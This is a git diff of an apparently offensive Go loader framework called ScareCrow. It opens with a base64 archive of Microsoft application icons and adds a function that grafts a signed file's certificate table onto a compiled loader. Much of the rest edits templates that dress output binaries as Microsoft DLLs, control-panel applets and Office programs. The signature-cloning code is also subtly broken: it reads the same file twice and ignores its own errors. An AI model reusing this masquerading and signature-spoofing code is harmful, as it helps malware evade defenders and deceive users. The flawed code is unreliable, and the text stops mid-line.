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" diff --git a/go.mod b/go.mod index 7fbc71a..f2ef878 100644 --- a/go.mod +++ b/go.mod @@ -1,15 +1,17 @@ module ScareCrow -go 1.17 +go 1.19 require ( + github.com/Binject/debug v0.0.0-20211007083345-9605c99179ee github.com/fatih/color v1.13.0 github.com/josephspurrier/goversioninfo v1.4.0 ) require ( github.com/akavel/rsrc v0.10.2 // indirect - github.com/mattn/go-colorable v0.1.12 // indirect + github.com/mattn/go-colorable v0.1.9 // indirect github.com/mattn/go-isatty v0.0.14 // indirect - golang.org/x/sys v0.0.0-20220412015802-83041a38b14a // indirect + github.com/ulikunitz/xz v0.5.11 // indirect + golang.org/x/sys v0.3.0 // indirect ) diff --git a/go.sum b/go.sum index e31cf42..c857912 100644 --- a/go.sum +++ b/go.sum @@ -1,3 +1,5 @@ +github.com/Binject/debug v0.0.0-20211007083345-9605c99179ee h1:neBp9wDYVY4Uu1gGlrL+IL4JeZslz+hGEAjBXGAPWak= +github.com/Binject/debug v0.0.0-20211007083345-9605c99179ee/go.mod h1:QzgxDLY/qdKlvnbnb65eqTedhvQPbaSP2NqIbcuKvsQ= github.com/akavel/rsrc v0.10.2 h1:Zxm8V5eI1hW4gGaYsJQUhxpjkENuG91ki8B4zCrvEsw= github.com/akavel/rsrc v0.10.2/go.mod h1:uLoCtb9J+EyAqh+26kdrTgmzRBFPGOolLWKpdxkKq+c= github.com/davecgh/go-spew v1.1.0 h1:ZDRjVQ15GmhC3fiQ8ni8+OwkZQO4DARzQgrnXU1Liz8= @@ -6,9 +8,8 @@ github.com/fatih/color v1.13.0 h1:8LOYc1KYPPmyKMuN8QV2DNRWNbLo6LZ0iLs8+mlH53w= github.com/fatih/color v1.13.0/go.mod h1:kLAiJbzzSOZDVNGyDpeOxJ47H46qBXwg5ILebYFFOfk= github.com/josephspurrier/goversioninfo v1.4.0 h1:Puhl12NSHUSALHSuzYwPYQkqa2E1+7SrtAPJorKK0C8= github.com/josephspurrier/goversioninfo v1.4.0/go.mod h1:JWzv5rKQr+MmW+LvM412ToT/IkYDZjaclF2pKDss8IY= +github.com/mattn/go-colorable v0.1.9 h1:sqDoxXbdeALODt0DAeJCVp38ps9ZogZEAXjus69YV3U= github.com/mattn/go-colorable v0.1.9/go.mod h1:u6P/XSegPjTcexA+o6vUJrdnUu04hMope9wVRipJSqc= -github.com/mattn/go-colorable v0.1.12 h1:jF+Du6AlPIjs2BiUiQlKOX0rt3SujHxPnksPKZbaA40= -github.com/mattn/go-colorable v0.1.12/go.mod h1:u5H1YNBxpqRaxsYJYSkiCWKzEfiAb1Gb520KVy5xxl4= github.com/mattn/go-isatty v0.0.12/go.mod h1:cbi8OIDigv2wuxKPP5vlRcQ1OAZbq2CE4Kysco4FUpU= github.com/mattn/go-isatty v0.0.14 h1:yVuAays6BHfxijgZPzw+3Zlu5yQgKGP2/hcQbHb7S9Y= github.com/mattn/go-isatty v0.0.14/go.mod h1:7GGIvUiUoEMVVmxf/4nioHXj79iQHKdU27kJ6hsGG94= @@ -17,12 +18,14 @@ github.com/pmezard/go-difflib v1.0.0/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZN github.com/stretchr/objx v0.1.0/go.mod h1:HFkY916IF+rwdDfMAkV7OtwuqBVzrE8GR6GFx+wExME= github.com/stretchr/testify v1.6.1 h1:hDPOHmpOpP40lSULcqw7IrRb/u7w6RpDC9399XyoNd0= github.com/stretchr/testify v1.6.1/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg= +github.com/ulikunitz/xz v0.5.11 h1:kpFauv27b6ynzBNT/Xy+1k+fK4WswhN/6PN5WhFAGw8= +github.com/ulikunitz/xz v0.5.11/go.mod h1:nbz6k7qbPmH4IRqmfOplQw/tblSgqTqBwxkY0oWt/14= golang.org/x/sys v0.0.0-20200116001909-b77594299b42/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= golang.org/x/sys v0.0.0-20200223170610-d5e6a3e2c0ae/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20210630005230-0f9fa26af87c h1:F1jZWGFhYfh0Ci55sIpILtKKK8p3i2/krTr0H1rg74I= golang.org/x/sys v0.0.0-20210630005230-0f9fa26af87c/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= -golang.org/x/sys v0.0.0-20210927094055-39ccf1dd6fa6/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= -golang.org/x/sys v0.0.0-20220412015802-83041a38b14a h1:MjZauhfFyuA8jS6CGa4rO215DgesKDIEzMSQ6mm8wW8= -golang.org/x/sys v0.0.0-20220412015802-83041a38b14a/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= +golang.org/x/sys v0.3.0 h1:w8ZOecv6NaNa/zC8944JTU3vz4u6Lagfk4RPQxv92NQ= +golang.org/x/sys v0.3.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0= gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c h1:dUUwHk2QECo/6vqA44rthZ8ie2QXMNeKRTHCNY2nXvo= gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM= diff --git a/limelighter/limelighter.go b/limelighter/limelighter.go index 7855f71..d075c0c 100644 --- a/limelighter/limelighter.go +++ b/limelighter/limelighter.go @@ -18,6 +18,7 @@ import ( "strings" "time" + "github.com/Binject/debug/pe" "github.com/josephspurrier/goversioninfo" ) @@ -152,6 +153,34 @@ func SignExecutable(password string, pfx string, filein string, fileout string) } } +func Cloner(CompiledLoader, FiletoClone string) { + Clonefile, err := ioutil.ReadFile(CompiledLoader) + if err != nil { + log.Fatalf("Error: %s", err) + } + LoaderFile, err := ioutil.ReadFile(CompiledLoader) + if err != nil { + log.Fatalf("Error: %s", err) + } + signedFileReader := bytes.NewReader(Clonefile) + signedPEFile, err := pe.NewFile(signedFileReader) + if err != nil { + + } + + targetFileReader := bytes.NewReader(LoaderFile) + targetPEFile, err := pe.NewFile(targetFileReader) + if err != nil { + + } + + targetPEFile.CertificateTable = signedPEFile.CertificateTable + Data, err := targetPEFile.Bytes() + if err != nil { + } + ioutil.WriteFile(CompiledLoader, Data, 0777) +} + func FileProperties(name string, configFile string) string { fmt.Println("[*] Creating an Embedded Resource File") vi := &goversioninfo.VersionInfo{} @@ -175,7 +204,6 @@ func FileProperties(name string, configFile string) string { name = vi.StringFileInfo.InternalName } else if configFile == "" { if name == "APMon" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "APMon.dll.mui" vi.StringFileInfo.FileDescription = "Adaptive Port Monitor" vi.StringFileInfo.FileVersion = "10.0.19041.1 (WinBuild.160101.0800)" @@ -193,7 +221,6 @@ func FileProperties(name string, configFile string) string { vi.StringFileInfo.InternalName = "APMon.dll.mui" } if name == "bisr" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "bisrv.dll.mui" vi.StringFileInfo.FileDescription = "Background Tasks Infrastructure Service" vi.StringFileInfo.FileVersion = "10.0.19041.1 (WinBuild.160101.0800)" @@ -211,7 +238,6 @@ func FileProperties(name string, configFile string) string { vi.StringFileInfo.InternalName = "bisrv.dll.mui" } if name == "btpanui" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "btpanui.dll.mui" vi.StringFileInfo.FileDescription = "Bluetooth PAN User Interface" vi.StringFileInfo.FileVersion = "10.0.19041.1 (WinBuild.160101.0800" @@ -229,7 +255,6 @@ func FileProperties(name string, configFile string) string { vi.StringFileInfo.InternalName = "btpanui.dll.mui" } if name == "certcli" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "CertCli" vi.StringFileInfo.FileDescription = "Microsoft® Active Directory Certificate Services Client" vi.StringFileInfo.FileVersion = "10.0.19041.1 (WinBuild.160101.0800)" @@ -247,7 +272,6 @@ func FileProperties(name string, configFile string) string { vi.StringFileInfo.InternalName = "CertCli" } if name == "cmdext" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "CmdExt.DLL" vi.StringFileInfo.FileDescription = "cmd.exe Extension DLL" vi.StringFileInfo.FileVersion = "10.0.19041.1023 (WinBuild.160101.0800)" @@ -265,7 +289,6 @@ func FileProperties(name string, configFile string) string { vi.StringFileInfo.InternalName = "CmdExt.DLL" } if name == "httpapi" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "httpapi.dll.mui" vi.StringFileInfo.FileDescription = "HTTP Protocol Stack API" vi.StringFileInfo.FileVersion = "10.0.19041.1 (WinBuild.160101.0800)" @@ -283,7 +306,6 @@ func FileProperties(name string, configFile string) string { vi.StringFileInfo.InternalName = "httpapi.dll.mui" } if name == "logoncli" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "LOGONCLI.DLL" vi.StringFileInfo.FileDescription = "Net Logon Client DLL" vi.StringFileInfo.FileVersion = "10.0.18362.1237 (WinBuild.160101.0800)" @@ -301,7 +323,6 @@ func FileProperties(name string, configFile string) string { vi.StringFileInfo.InternalName = "LOGONCLI.DLL" } if name == "netlogon" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "NetLogon.DLL.MUI" vi.StringFileInfo.FileDescription = "Net Logon Services DLL" vi.StringFileInfo.FileVersion = "10.0.19041.1 (WinBuild.160101.0800)" @@ -319,7 +340,6 @@ func FileProperties(name string, configFile string) string { vi.StringFileInfo.InternalName = "NetLogon.DLL.MUI" } if name == "tcpmon" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "tcpmon.dll.mui" vi.StringFileInfo.FileDescription = "Standard TCP/IP Port Monitor DLL" vi.StringFileInfo.FileVersion = "10.0.19041.1 (WinBuild.160101.0800)" @@ -396,7 +416,7 @@ func FileProperties(name string, configFile string) string { } if name == "Outlook" { vi.IconPath = "outlook.ico" - vi.StringFileInfo.InternalName = "Outlook" + vi.StringFileInfo.InternalName = "Outlook.exe" vi.StringFileInfo.FileDescription = "Microsoft Outlook" vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." vi.StringFileInfo.FileVersion = "16.0.14326.20404" @@ -407,7 +427,10 @@ func FileProperties(name string, configFile string) string { vi.FixedFileInfo.FileVersion.Minor = 0 vi.FixedFileInfo.FileVersion.Patch = 14326 vi.FixedFileInfo.FileVersion.Build = 20404 - vi.StringFileInfo.InternalName = "Outlook" + vi.FixedFileInfo.ProductVersion.Patch = 14326 + vi.FixedFileInfo.ProductVersion.Major = 16 + vi.FixedFileInfo.ProductVersion.Minor = 0 + vi.StringFileInfo.InternalName = "Outlook.exe" } if name == "lync" { vi.IconPath = "lync.ico" @@ -455,7 +478,6 @@ func FileProperties(name string, configFile string) string { vi.StringFileInfo.InternalName = "OneDrive.exe" } if name == "apphelp" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "Apphelp" vi.StringFileInfo.FileDescription = "Application Compatibility Client Library" vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" @@ -473,7 +495,6 @@ func FileProperties(name string, configFile string) string { vi.StringFileInfo.OriginalFilename = "Apphelp.dll" } if name == "bcryptprimitives" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "bcryptprimitives.dll" vi.StringFileInfo.FileDescription = "Windows Cryptographic Primitives Library" vi.StringFileInfo.FileVersion = "10.0.18362.836 (WinBuild.160101.0800)" @@ -491,7 +512,6 @@ func FileProperties(name string, configFile string) string { vi.StringFileInfo.OriginalFilename = "bcryptprimitives.dll" } if name == "cfgmgr32" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "cfgmgr32.dll" vi.StringFileInfo.FileDescription = "Configuration Manager DLL" vi.StringFileInfo.FileVersion = "10.0.18362.387 (WinBuild.160101.0800)" @@ -509,7 +529,6 @@ func FileProperties(name string, configFile string) string { vi.StringFileInfo.OriginalFilename = "cfgmgr32.dll" } if name == "combase" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "COMBASE.DLL" vi.StringFileInfo.FileDescription = "Microsoft COM for Windows" vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" @@ -527,7 +546,6 @@ func FileProperties(name string, configFile string) string { vi.StringFileInfo.OriginalFilename = "COMBASE.DLL" } if name == "cryptsp" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "cryptsp.dll" vi.StringFileInfo.FileDescription = "Cryptographic Service Provider API" vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" @@ -545,7 +563,6 @@ func FileProperties(name string, configFile string) string { vi.StringFileInfo.OriginalFilename = "cryptsp.dll" } if name == "dnsapi" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "dnsapi" vi.StringFileInfo.FileDescription = "DNS Client API DLL" vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" @@ -563,7 +580,6 @@ func FileProperties(name string, configFile string) string { vi.StringFileInfo.OriginalFilename = "dnsapi" } if name == "dpapi" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "dpapi.dll" vi.StringFileInfo.FileDescription = "Data Protection API" vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" @@ -581,7 +597,6 @@ func FileProperties(name string, configFile string) string { vi.StringFileInfo.OriginalFilename = "dpapi.dll" } if name == "sechost" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "sechost.dll" vi.StringFileInfo.FileDescription = "Host for SCM/SDDL/LSA Lookup APIs" vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" @@ -599,7 +614,6 @@ func FileProperties(name string, configFile string) string { vi.StringFileInfo.OriginalFilename = "sechost.dll" } if name == "schannel" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "schannel.dll" vi.StringFileInfo.FileDescription = "TLS / SSL Security Provider" vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" @@ -617,7 +631,6 @@ func FileProperties(name string, configFile string) string { vi.StringFileInfo.OriginalFilename = "schannel.dll" } if name == "urlmon" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "UrlMon.dll" vi.StringFileInfo.FileDescription = "OLE32 Extensions for Win32" vi.StringFileInfo.FileVersion = "11.00.18362.1 (WinBuild.160101.0800)" @@ -635,7 +648,6 @@ func FileProperties(name string, configFile string) string { vi.StringFileInfo.OriginalFilename = "UrlMon.dll" } if name == "win32u" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "Win32u" vi.StringFileInfo.FileDescription = "Win32u" vi.StringFileInfo.FileVersion = "10.0.18362.900 (WinBuild.160101.0800)" @@ -653,7 +665,6 @@ func FileProperties(name string, configFile string) string { vi.StringFileInfo.OriginalFilename = "Win32u" } if name == "appwizard" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "appwiz.cpl" vi.StringFileInfo.FileDescription = "Shell Application Manager" vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" @@ -671,7 +682,6 @@ func FileProperties(name string, configFile string) string { vi.StringFileInfo.InternalName = "appwiz.cpl" } if name == "bthprop" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "bthprops.cpl" vi.StringFileInfo.FileDescription = "Bluetooth Control Panel Applet" vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" @@ -689,7 +699,6 @@ func FileProperties(name string, configFile string) string { vi.StringFileInfo.InternalName = "bthprops.cpl" } if name == "desktop" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "desk.cpl" vi.StringFileInfo.FileDescription = "Desktop Settings Control Panel" vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" @@ -708,7 +717,6 @@ func FileProperties(name string, configFile string) string { } if name == "netfirewall" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "Firewall.cpl" vi.StringFileInfo.FileDescription = "Windows Defender Firewall Control Panel DLL Launching Stub" vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" @@ -726,7 +734,6 @@ func FileProperties(name string, configFile string) string { vi.StringFileInfo.InternalName = "Firewall.cpl" } if name == "FlashPlayer" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = " Adobe Flash Player Control Panel Applet 32.0" vi.StringFileInfo.FileDescription = " Adobe Flash Player Control Panel Applet" vi.StringFileInfo.FileVersion = "32.0.0.255" @@ -744,7 +751,6 @@ func FileProperties(name string, configFile string) string { vi.StringFileInfo.InternalName = "FlashPlayerCPLApp.cpl" } if name == "hardwarewiz" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "hdwwiz.cpl" vi.StringFileInfo.FileDescription = "Add Hardware Control Panel Applet" vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" @@ -762,7 +768,6 @@ func FileProperties(name string, configFile string) string { vi.StringFileInfo.InternalName = "hdwwiz" } if name == "inet" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "inetcpl.cpl" vi.StringFileInfo.FileDescription = "Internet Control Panel" vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" @@ -780,7 +785,6 @@ func FileProperties(name string, configFile string) string { vi.StringFileInfo.InternalName = "inetcpl.cpl" } if name == "control" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "intl.cpl" vi.StringFileInfo.FileDescription = "Control Panel DLL" vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" @@ -798,7 +802,6 @@ func FileProperties(name string, configFile string) string { vi.StringFileInfo.InternalName = "CONTROL" } if name == "irprop" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "irprops.cpl" vi.StringFileInfo.FileDescription = "Infrared Control Panel Applet" vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" @@ -816,7 +819,6 @@ func FileProperties(name string, configFile string) string { vi.StringFileInfo.InternalName = "Infrared Properties" } if name == "Game" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "joy.cpl" vi.StringFileInfo.FileDescription = "Game Controllers Control Panel Applet" vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" @@ -834,7 +836,6 @@ func FileProperties(name string, configFile string) string { vi.StringFileInfo.InternalName = "JOY.CPL" } if name == "inputs" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "main.cpl" vi.StringFileInfo.FileDescription = "Mouse and Keyboard Control Panel Applets" vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" @@ -853,7 +854,6 @@ func FileProperties(name string, configFile string) string { } if name == "mimosys" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "mmsys.dll" vi.StringFileInfo.FileDescription = "Audio Control Panel" vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" @@ -871,7 +871,6 @@ func FileProperties(name string, configFile string) string { vi.StringFileInfo.InternalName = "mmsys.cpl" } if name == "ncp" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "ncpa.cpl" vi.StringFileInfo.FileDescription = "Network Connections Control-Panel Stub" vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" @@ -889,7 +888,6 @@ func FileProperties(name string, configFile string) string { vi.StringFileInfo.InternalName = "ncpa.cpl" } if name == "power" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "powercfg.cpl" vi.StringFileInfo.FileDescription = "Power Management Configuration Control Panel Applet" vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" @@ -907,7 +905,6 @@ func FileProperties(name string, configFile string) string { vi.StringFileInfo.InternalName = "powercfg.cpl" } if name == "speech" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "sapi.cpl" vi.StringFileInfo.FileDescription = "Speech UX Control Panel" vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" @@ -926,7 +923,6 @@ func FileProperties(name string, configFile string) string { } if name == "system" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "sysdm.cpl" vi.StringFileInfo.FileDescription = "System Applet for the Control Panel" vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" @@ -944,7 +940,6 @@ func FileProperties(name string, configFile string) string { vi.StringFileInfo.InternalName = "sysdm.cpl" } if name == "Tablet" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "TabletPC.cpl" vi.StringFileInfo.FileDescription = "Tablet PC Control Panel" vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" @@ -962,7 +957,6 @@ func FileProperties(name string, configFile string) string { vi.StringFileInfo.InternalName = "TabletPC.cpl" } if name == "telephone" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "telephon.cpl" vi.StringFileInfo.FileDescription = "Telephony Control Panel" vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" @@ -980,7 +974,6 @@ func FileProperties(name string, configFile string) string { vi.StringFileInfo.InternalName = "telephon.cpl" } if name == "datetime" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "timedate.cpl" vi.StringFileInfo.FileDescription = "Time Date Control Panel Applet" vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" @@ -998,7 +991,6 @@ func FileProperties(name string, configFile string) string { vi.StringFileInfo.InternalName = "timedate.cpl" } if name == "winsec" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "wscui.cpl" vi.StringFileInfo.FileDescription = "Security and Maintenance" vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" @@ -1016,7 +1008,6 @@ func FileProperties(name string, configFile string) string { vi.StringFileInfo.InternalName = "wscui.cpl" } if name == "Timesheet" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "Timesheet.xll " vi.StringFileInfo.FileDescription = "Timesheet ToolPak" vi.StringFileInfo.FileVersion = "16.0.10001.10000" @@ -1034,7 +1025,6 @@ func FileProperties(name string, configFile string) string { vi.StringFileInfo.InternalName = "Timesheet.xll" } if name == "Reports" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "Reports.xll " vi.StringFileInfo.FileDescription = "Report ToolPak" vi.StringFileInfo.FileVersion = "16.0.10001.10000" @@ -1052,7 +1042,6 @@ func FileProperties(name string, configFile string) string { vi.StringFileInfo.InternalName = "Reports.xll" } if name == "Zoom" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "Zoom.xll" vi.StringFileInfo.FileDescription = "Zoom Addon ToolPak" vi.StringFileInfo.FileVersion = 